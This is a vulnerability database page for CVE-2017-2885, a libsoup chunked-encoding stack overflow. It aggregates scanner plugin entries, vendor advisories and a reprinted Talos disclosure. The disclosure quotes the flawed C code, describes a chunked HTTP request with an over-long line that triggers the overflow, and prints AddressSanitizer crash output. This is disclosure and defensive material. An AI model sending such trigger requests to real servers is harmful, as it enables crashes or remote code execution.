Vulnerabilities > CVE-2017-2885 - Out-of-bounds Write vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
gnome
debian
redhat
CWE-787
critical
nessus

Summary

An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability.

Common Weakness Enumeration (CWE)

Nessus

  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_8E7BBDDD833811E7867FB499BAEBFEAF.NASL
    descriptionTobias Mueller reports : libsoup is susceptible to a stack based buffer overflow attack when using chunked encoding. Regardless of libsoup being used as a server or client.
    last seen2020-06-01
    modified2020-06-02
    plugin id102553
    published2017-08-18
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102553
    titleFreeBSD : libsoup -- stack based buffer overflow (8e7bbddd-8338-11e7-867f-b499baebfeaf)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2130-1.NASL
    descriptionThis update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102414
    published2017-08-11
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102414
    titleSUSE SLES12 Security Update : libsoup (SUSE-SU-2017:2130-1)
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-1_0-0149.NASL
    descriptionAn update of {'openssl', 'libsoup'} packages of Photon OS has been released.
    last seen2019-02-21
    modified2019-02-07
    plugin id111275
    published2018-07-24
    reporterTenable
    sourcehttps://www.tenable.com/plugins/index.php?view=single&id=111275
    titlePhoton OS 1.0 : openssl / libsoup (PhotonOS-PHSA-2018-1.0-0149) (deprecated)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20170815_LIBSOUP_ON_SL7_X.NASL
    descriptionSecurity Fix(es) : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885)
    last seen2020-03-18
    modified2017-08-22
    plugin id102670
    published2017-08-22
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102670
    titleScientific Linux Security Update : libsoup on SL7.x x86_64 (20170815)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-2204-2.NASL
    descriptionThis update for libsoup fixes the following issues : Security issue fixed : CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes: bsc#1086036: translation-update-upstream commented out for Leap Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-18
    modified2019-01-09
    plugin id121042
    published2019-01-09
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121042
    titleSUSE SLES12 Security Update : libsoup (SUSE-SU-2018:2204-2)
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-2_0-0060.NASL
    descriptionAn update of {'libtiff', 'glibc', 'libsoup'} packages of Photon OS has been released.
    last seen2019-02-21
    modified2019-02-07
    plugin id111309
    published2018-07-24
    reporterTenable
    sourcehttps://www.tenable.com/plugins/index.php?view=single&id=111309
    titlePhoton OS 2.0 : libtiff / glibc / libsoup (PhotonOS-PHSA-2018-2.0-0060) (deprecated)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3383-1.NASL
    descriptionAleksandar Nikolic discovered a stack based buffer overflow when handling chunked encoding. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102417
    published2017-08-11
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102417
    titleUbuntu 14.04 LTS / 16.04 LTS / 17.04 : libsoup2.4 vulnerability (USN-3383-1)
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-2_0-0060_LIBTIFF.NASL
    descriptionAn update of the libtiff package has been released.
    last seen2020-03-17
    modified2019-02-07
    plugin id121958
    published2019-02-07
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121958
    titlePhoton OS 2.0: Libtiff PHSA-2018-2.0-0060
  • NASL familySlackware Local Security Checks
    NASL idSLACKWARE_SSA_2017-223-02.NASL
    descriptionNew libsoup packages are available for Slackware 14.1, 14.2, and -current to fix a security issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id102433
    published2017-08-14
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102433
    titleSlackware 14.1 / 14.2 / current : libsoup (SSA:2017-223-02)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201709-26.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201709-26 (libsoup: Arbitrary remote code execution) A stack based buffer overflow vulnerability was discovered in libsoup. Impact : A remote attacker, by using specially crafted HTTP requests, could execute arbitrary code with the privileges of the process. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id103485
    published2017-09-27
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103485
    titleGLSA-201709-26 : libsoup: Arbitrary remote code execution
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2018-856.NASL
    descriptionThis update for libsoup fixes the following issues : Security issue fixed : - CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). - CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes : - bsc#1086036: translation-update-upstream commented out for Leap This update was imported from the SUSE:SLE-12-SP2:Update update project.
    last seen2020-06-05
    modified2018-08-10
    plugin id111637
    published2018-08-10
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/111637
    titleopenSUSE Security Update : libsoup (openSUSE-2018-856)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-1F4C82D73E.NASL
    descriptionSecurity fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2017-08-22
    plugin id102631
    published2017-08-22
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102631
    titleFedora 26 : mingw-libsoup (2017-1f4c82d73e)
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-2_0-0060_GLIBC.NASL
    descriptionAn update of the glibc package has been released.
    last seen2020-03-17
    modified2019-02-07
    plugin id121956
    published2019-02-07
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121956
    titlePhoton OS 2.0: Glibc PHSA-2018-2.0-0060
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-1_0-0149_LIBSOUP.NASL
    descriptionAn update of the libsoup package has been released.
    last seen2020-03-17
    modified2019-02-07
    plugin id121847
    published2019-02-07
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121847
    titlePhoton OS 1.0: Libsoup PHSA-2018-1.0-0149
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-2_0-0060_LIBSOUP.NASL
    descriptionAn update of the libsoup package has been released.
    last seen2020-03-17
    modified2019-02-07
    plugin id121957
    published2019-02-07
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121957
    titlePhoton OS 2.0: Libsoup PHSA-2018-2.0-0060
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-B0EC173BD1.NASL
    descriptionSecurity fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2017-08-14
    plugin id102460
    published2017-08-14
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102460
    titleFedora 26 : libsoup (2017-b0ec173bd1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-2204-1.NASL
    descriptionThis update for libsoup fixes the following issues: Security issue fixed : - CVE-2018-12910: Fix crash when handling empty hostnames (bsc#1100097). - CVE-2017-2885: Fix chunk decoding buffer overrun that could be exploited against either clients or servers (bsc#1052916). Bug fixes : - bsc#1086036: translation-update-upstream commented out for Leap Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id111574
    published2018-08-07
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/111574
    titleSUSE SLED12 / SLES12 Security Update : libsoup (SUSE-SU-2018:2204-1)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-1392.NASL
    descriptionAccording to the versions of the libsoup package installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities : - The get_cookies function in soup-cookie-jar.c in libsoup 2.63.2 allows attackers to have unspecified impact via an empty hostname.(CVE-2018-12910) - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality.(CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id124895
    published2019-05-14
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/124895
    titleEulerOS Virtualization for ARM 64 3.0.1.0 : libsoup (EulerOS-SA-2019-1392)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2017-1210.NASL
    descriptionAccording to the version of the libsoup packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-05-06
    modified2017-09-11
    plugin id103068
    published2017-09-11
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103068
    titleEulerOS 2.0 SP2 : libsoup (EulerOS-SA-2017-1210)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-2459.NASL
    descriptionAn update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id102412
    published2017-08-11
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102412
    titleRHEL 7 : libsoup (RHSA-2017:2459)
  • NASL familyPhotonOS Local Security Checks
    NASL idPHOTONOS_PHSA-2018-1_0-0149_OPENSSL.NASL
    descriptionAn update of the openssl package has been released.
    last seen2020-03-17
    modified2019-02-07
    plugin id121848
    published2019-02-07
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121848
    titlePhoton OS 1.0: Openssl PHSA-2018-1.0-0149
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2017-2129-1.NASL
    descriptionThis update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id102413
    published2017-08-11
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102413
    titleSUSE SLED12 / SLES12 Security Update : libsoup (SUSE-SU-2017:2129-1)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2017-2459.NASL
    descriptionAn update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id102764
    published2017-08-25
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102764
    titleCentOS 7 : libsoup (CESA-2017:2459)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2017-914.NASL
    descriptionThis update for libsoup fixes the following issues : - A bug in the HTTP Chunked Encoding code has been fixed that could have been exploited by attackers to cause a stack-based buffer overflow in client or server code running libsoup (bsc#1052916, CVE-2017-2885). This update was imported from the SUSE:SLE-12-SP2:Update update project.
    last seen2020-06-05
    modified2017-08-14
    plugin id102468
    published2017-08-14
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102468
    titleopenSUSE Security Update : libsoup (openSUSE-2017-914)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-2459.NASL
    descriptionFrom Red Hat Security Advisory 2017:2459 : An update for libsoup is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The libsoup packages provide an HTTP client and server library for GNOME. Security Fix(es) : * A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Red Hat would like to thank Aleksandar Nikolic (Cisco Talos) for reporting this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id102409
    published2017-08-11
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102409
    titleOracle Linux 7 : libsoup (ELSA-2017-2459)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2017-1209.NASL
    descriptionAccording to the version of the libsoup packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A stack-based buffer overflow flaw was discovered within the HTTP processing of libsoup. A remote attacker could exploit this flaw to cause a crash or, potentially, execute arbitrary code by sending a specially crafted HTTP request to a server using the libsoup HTTP server functionality or by tricking a user into connecting to a malicious HTTP server with an application using the libsoup HTTP client functionality. (CVE-2017-2885) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-05-06
    modified2017-09-11
    plugin id103067
    published2017-09-11
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103067
    titleEulerOS 2.0 SP1 : libsoup (EulerOS-SA-2017-1209)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-872A0A9A85.NASL
    descriptionSecurity fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2017-08-14
    plugin id102457
    published2017-08-14
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102457
    titleFedora 25 : libsoup (2017-872a0a9a85)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-C9D8011D69.NASL
    descriptionSecurity fix for CVE-2017-2885 (stack based buffer overflow with HTTP Chunked Encoding). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2017-08-24
    plugin id102721
    published2017-08-24
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102721
    titleFedora 25 : mingw-libsoup (2017-c9d8011d69)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-3929.NASL
    descriptionAleksandar Nikolic of Cisco Talos discovered a stack-based buffer overflow vulnerability in libsoup2.4, a HTTP library implementation in C. A remote attacker can take advantage of this flaw by sending a specially crafted HTTP request to cause an application using the libsoup2.4 library to crash (denial of service), or potentially execute arbitrary code.
    last seen2020-06-01
    modified2020-06-02
    plugin id102370
    published2017-08-11
    reporterThis script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/102370
    titleDebian DSA-3929-1 : libsoup2.4 - security update

Redhat

advisories
bugzilla
id1479281
titleCVE-2017-2885 libsoup: Stack based buffer overflow with HTTP Chunked Encoding
oval
OR
  • commentRed Hat Enterprise Linux must be installed
    ovaloval:com.redhat.rhba:tst:20070304026
  • AND
    • commentRed Hat Enterprise Linux 7 is installed
      ovaloval:com.redhat.rhba:tst:20150364027
    • OR
      • AND
        • commentlibsoup-devel is earlier than 0:2.56.0-4.el7_4
          ovaloval:com.redhat.rhsa:tst:20172459001
        • commentlibsoup-devel is signed with Red Hat redhatrelease2 key
          ovaloval:com.redhat.rhsa:tst:20111102004
      • AND
        • commentlibsoup is earlier than 0:2.56.0-4.el7_4
          ovaloval:com.redhat.rhsa:tst:20172459003
        • commentlibsoup is signed with Red Hat redhatrelease2 key
          ovaloval:com.redhat.rhsa:tst:20111102002
rhsa
idRHSA-2017:2459
released2017-08-10
severityImportant
titleRHSA-2017:2459: libsoup security update (Important)
rpms
  • libsoup-0:2.56.0-4.el7_4
  • libsoup-debuginfo-0:2.56.0-4.el7_4
  • libsoup-devel-0:2.56.0-4.el7_4

Seebug

bulletinFamilyexploit
description### Summary An exploitable stack based buffer overflow vulnerability exists in the GNOME libsoup 2.58. A specially crafted HTTP request can cause a stack overflow resulting in remote code execution. An attacker can send a special HTTP request to the vulnerable server to trigger this vulnerability. ### Tested Versions GNOME libsoup 2.58 ### Product URLs https://wiki.gnome.org/action/show/Projects/libsoup ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-121: Stack-based Buffer Overflow ### Details GNOME libsoup is a library implementing client and server side code for dealing with HTTP requests and responses. It is used to implement custom web servers or clients. Usually it is used embedded in other applications such as media streaming servers for basic web server functionality. It can also be used standalone and embedded in hardware devices. When processing an HTTP request which contains chunk encoded data, an improper bounds checking can lead to large memory copy operation which can overflow a statically sized buffer on the stack. Buffer that is being overflown is located in function `soup_body_input_stream_read_chunked` in file libsoup/soup-body-input-stream.c: ``` static gssize soup_body_input_stream_read_chunked (SoupBodyInputStream *bistream, void *buffer, gsize count, gboolean blocking, GCancellable *cancellable, GError **error) SoupFilterInputStream *fstream = SOUP_FILTER_INPUT_STREAM (bistream->priv->base_stream); char metabuf[128]; [1] gssize nread; gboolean got_line; ``` The buffer is allocated on the stack at [1]. While further processing the body of a chunk-encoded HTTP request, function `soup_filter_input_stream_read_line` is called: ``` case SOUP_BODY_INPUT_STREAM_STATE_CHUNK_END: nread = soup_filter_input_stream_read_line ( SOUP_FILTER_INPUT_STREAM (bistream->priv->base_stream), metabuf, sizeof (metabuf), blocking, &got_line, cancellable, error); ``` In the above code, we can see `metabuf` and it’s length being passed to the `soup_filter_input_stream_read_line` function which is just a wrapper around `soup_filter_input_stream_read_until` being called with new line as delimiter: ``` gssize soup_filter_input_stream_read_line (SoupFilterInputStream *fstream, void *buffer, gsize length, gboolean blocking, gboolean *got_line, GCancellable *cancellable, GError **error) return soup_filter_input_stream_read_until (fstream, buffer, length, "\n", 1, blocking, TRUE, got_line, cancellable, error); ``` Function `soup_filter_input_stream_read_until` does the actual reading from the input stream into the buffer. ``` /* Scan for the boundary */ end = buf + fstream->priv->buf->len; [2] if (!eof) end -= boundary_length; for (p = buf; p <= end; p++) { [3] if (*p == *(guint8*)boundary && !memcmp (p, boundary, boundary_length)) { [4] if (include_boundary) p += boundary_length; *got_boundary = TRUE; break; if (!*got_boundary && fstream->priv->buf->len < length && !eof) goto fill_buffer; /* Return everything up to 'p' (which is either just after the boundary if * include_boundary is TRUE, just before the boundary if include_boundary is * FALSE, @boundary_len - 1 bytes before the end of the buffer, or end-of- * file). */ return read_from_buf (fstream, buffer, p - buf); [5] ``` In the above code, at [2] a pointer to the end of the stream data is calculated, at [3] it is used as an end condition in a for loop which is looking for a set delimiter (variable boundary, a newline character in this case) at [4]. Pointer p is being incremented in the loop until newline is found. Finally, at [5], function read_from_buf is called with input stream as source, buffer as destination and offset to newline character as length. No check to make sure the buffer is big enough is performed anywhere. In the function read_from_buf a memcpy call can thus lead to a buffer overflow: ``` static gssize read_from_buf (SoupFilterInputStream *fstream, gpointer buffer, gsize count) GByteArray *buf = fstream->priv->buf; if (buf->len < count) count = buf->len; memcpy (buffer, buf->data, count); ``` To trigger this vulnerability, a simple HTTP request like the following is enough: GET / HTTP/1.0 Transfer-Encoding: chunked When parsing this request, the first chunk will be of size 1, and then the parser proceeds to scan the overly long series of A characters for a new line. A string longer than 128 characters will overflow the buffer. This can be abused in order to crash the server or achieve remote code execution in the context of the server. When parsing this request, the first chunk will be of size 1, and then the parser proceeds to scan the overly long series of A characters for a new line. A string longer than 128 characters will overflow the buffer. This can be abused in order to crash the server or achieve remote code execution in the context of the server. ### Crash Information ``` Address Sanitizer output: Listening on http://0.0.0.0:12323/ Listening on http://[::]:12323/ Waiting for requests... ================================================================= ==119749==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffb280 at pc 0x0000004a3bfd bp 0x7fffffffb010 sp 0x7fffffffa7c0 WRITE of size 151 at 0x7fffffffb280 thread T0 #0 0x4a3bfc in __asan_memcpy ??:? #1 0x4a3bfc in ?? ??:0 #2 0x7ffff7962126 in read_from_buf /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:59 #3 0x7ffff7962126 in soup_filter_input_stream_read_until /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:278 #4 0x7ffff7962126 in ?? ??:0 #5 0x7ffff7961475 in soup_filter_input_stream_read_line /home/user/libsoup/libsoup/libsoup/soup-filter-input-stream.c:183 #6 0x7ffff7961475 in ?? ??:0 #7 0x7ffff791fd45 in soup_body_input_stream_read_chunked /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:194 #8 0x7ffff791fd45 in read_internal /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:249 #9 0x7ffff791fd45 in ?? ??:0 #10 0x7ffff79966b0 in io_read /home/user/libsoup/libsoup/libsoup/soup-message-io.c:762 #11 0x7ffff79966b0 in ?? ??:0 #12 0x7ffff79901b5 in io_run_until /home/user/libsoup/libsoup/libsoup/soup-message-io.c:982 #13 0x7ffff79901b5 in ?? ??:0 #14 0x7ffff7993ee3 in io_run /home/user/libsoup/libsoup/libsoup/soup-message-io.c:1053 #15 0x7ffff7993ee3 in ?? ??:0 #16 0x7ffff7999939 in soup_message_read_request /home/user/libsoup/libsoup/libsoup/soup-message-server-io.c:304 #17 0x7ffff7999939 in ?? ??:0 #18 0x7ffff71a00a6 in g_cclosure_marshal_VOID__OBJECTv ??:? #19 0x7ffff71a00a6 in ?? ??:0 #20 0x7ffff719d1d3 in g_closure_invoke ??:? #21 0x7ffff719d1d3 in ?? ??:0 #22 0x7ffff71b79a5 in g_signal_emit_valist ??:? #23 0x7ffff71b79a5 in ?? ??:0 #24 0x7ffff71b808e in g_signal_emit ??:? #25 0x7ffff71b808e in ?? ??:0 #26 0x7ffff79e894a in listen_watch /home/user/libsoup/libsoup/libsoup/soup-socket.c:1237 #27 0x7ffff79e894a in ?? ??:0 #28 0x7ffff6ec6049 in g_main_context_dispatch ??:? #29 0x7ffff6ec6049 in ?? ??:0 #30 0x7ffff6ec63ef in g_main_context_dispatch ??:? #31 0x7ffff6ec63ef in ?? ??:0 #32 0x7ffff6ec6711 in g_main_loop_run ??:? #33 0x7ffff6ec6711 in ?? ??:0 #34 0x4eb8cc in main /home/user/libsoup/libsoup/examples/simple-httpd.c:360 #35 0x4eb8cc in ?? ??:0 #36 0x7ffff5f8a82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291 #37 0x7ffff5f8a82f in ?? ??:0 #38 0x419dc8 in _start ??:? #39 0x419dc8 in ?? ??:0 ``` Address 0x7fffffffb280 is located in stack of thread T0 at offset 160 in frame ``` #0 0x7ffff791f8af in read_internal /home/user/libsoup/libsoup/libsoup/soup-body-input-stream.c:237 #1 0x7ffff791f8af in ?? ??:0 This frame has 2 object(s): [32, 160) 'metabuf.i' [192, 196) 'got_line.i' <== Memory access at offset 160 partially underflows this variable ``` HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext ``` (longjmp and C++ exceptions *are* supported) ``` SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/user/libsoup/libsoup/examples/.libs/simple-httpd+0x4a3bfc) Shadow bytes around the buggy address: ``` 0x10007fff7600: 00 00 00 00 f1 f1 f1 f1 00 f3 f3 f3 00 00 00 00 0x10007fff7610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7630: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10007fff7640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7650:[f2]f2 f2 f2 04 f3 f3 f3 00 00 00 00 00 00 00 00 0x10007fff7660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7670: 00 00 00 00 ca ca ca ca 00 00 00 00 00 00 00 00 0x10007fff7680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff76a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ``` Shadow byte legend (one shadow byte represents 8 application bytes): ``` Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left 